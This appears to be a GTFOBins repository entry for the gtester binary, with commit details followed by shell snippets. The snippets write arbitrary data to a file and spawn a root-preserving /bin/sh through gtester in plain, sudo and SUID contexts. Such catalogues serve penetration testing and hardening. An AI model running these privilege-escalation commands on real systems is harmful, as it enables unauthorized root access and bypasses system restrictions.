Files
GTFOBins.github.io/_gtfobins/gtester.md
LinuxSploit fe7b3d797f Add gtester file-write
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-06-24 08:53:52 +02:00

30 lines
716 B
Markdown

---
functions:
file-write:
- description: Data to be written appears in an XML attribute in the output file: `<testbinary path="DATA">`.
code: |
LFILE=file_to_write
gtester "DATA" -o $LFILE
shell:
- code: |
TF=$(mktemp)
echo '#!/bin/sh' > $TF
echo 'exec /bin/sh -p 0<&1' >> $TF
chmod +x $TF
gtester -q $TF
sudo:
- code: |
TF=$(mktemp)
echo '#!/bin/sh' > $TF
echo 'exec /bin/sh 0<&1' >> $TF
chmod +x $TF
sudo gtester -q $TF
suid:
- code: |
TF=$(mktemp)
echo '#!/bin/sh -p' > $TF
echo 'exec /bin/sh -p 0<&1' >> $TF
chmod +x $TF
sudo gtester -q $TF
---